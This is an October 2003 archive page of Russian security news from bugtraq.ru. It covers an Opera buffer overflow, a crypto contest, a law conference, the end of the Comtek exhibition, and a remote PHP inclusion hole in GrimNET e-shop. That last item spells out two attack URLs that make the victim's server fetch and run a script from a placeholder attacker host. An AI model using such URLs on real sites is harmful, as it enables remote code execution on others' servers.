Переполнение буфера в Opera
Ktirf // 23.10.03 22:25
По сообщению AtStake, в версиях 7.11 и 7.20 (и для Windows, и для Linux) браузера и почтового клиента Opera имеется опасная ошибка, позволяющая вызвать переполнение буфера, размещенного в динамической памяти, при показе страницы с особым образом сформированной гиперссылкой.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/10/41.html]
Ошибка устранена в версии 7.21.

Источник: AtStake теги: linux, windows, opera  |  обсудить  |  все отзывы (0)

Очередной криптоконкурс
dl // 22.10.03 19:21
Thawte Consulting объявила об очередном конкурсе на вскрытие зашифрованного текста, который начнется 27 октября.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/10/40.html]
Для решения поставленной задачи не потребуются значительные вычислительные ресурсы - по крайней мере, в предыдущих конкурсах использовались вариации на тему достаточно простых подстановочных шифров. Победитель получит экземпляр книги Митника "The Art of Deception".

С предыдущими заданиями можно ознакомиться здесь.

Источник: LinuxWorld обсудить  |  все отзывы (0)

V международная конференция "Право и Интернет: теория и практика"
dl // 21.10.03 18:13
25-26 ноября в Москве пройдет V международная конференция "Право и Интернет: теория и практика".
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/10/39.html]
Приглашаются все заинтересованные лица.

В рамках основной темы этого года "Проблемы интеллектуальной собственности в киберпространстве" предлагаются следующие направления работы:
- проблемы интеллектуальной собственности в Интернет;
- правовые аспекты информационной безопасности;
- электронный документооборот в гражданско-правовых, уголовно-правовых, публично-правовых отношениях.

Планируется проведение круглого стола по использованию кибертехнологий в юридическом образовании и круглого стола грантодателей.

Также доступен и сайт с материалами прошлогодней конференции.

Источник: сайт конференции теги: конференции  |  обсудить  |  все отзывы (0)

Выставка Comtek прекращает свое существование
jammer // 21.10.03 12:35
На днях британская выставочная группа ITE, владеющая правом на проведение крупнейшей российской компьютерной выставки - Comtek, объявила, что выставка прекращает свое существование.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/10/38.html]
Маркетологи ITE пришли к выводу, что брэнд Comtek "себя дискредитировал", а потому вместо одноименного шоу решено проводить несколько небольших специализированных выставок под общим названием IT-Week.

Источник: rambler.ru обсудить  |  все отзывы (5)

Выполнение произвольного PHP-кода в GrimNET e-shop
dl // 20.10.03 22:37
Не представляю, насколько актуальна эта самая корейская система электронных магазинов, но дырка любопытна и сама по себе.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/10/37.html]

Входящие в ее комплект файлы shop.html и notice.html позволяют подключить к себе (и в дальнейшем выполнить) любой файл, указанный в переменной incstr без какой бы то ни было проверки содержимого:
http://[victim]/shop.html?incstr=http://[hacker]/myfile.php
http://[victim]/notice.html?incstr=http://[hacker]/myfile.php
Если на атакующем хосте установлен php, то сценарию, естественно, нужно дать расширение, не приводящее к его исполнению - например myfile.inc.

Источник: NivaX, http://www.web-hack.ru теги: .net  |  обсудить  |  все отзывы (0)

««    «   391  |  392  |  393  |  394  |  395  |  396  |  397  |  398  |  399  |  400   »    »»

Предложить свою новость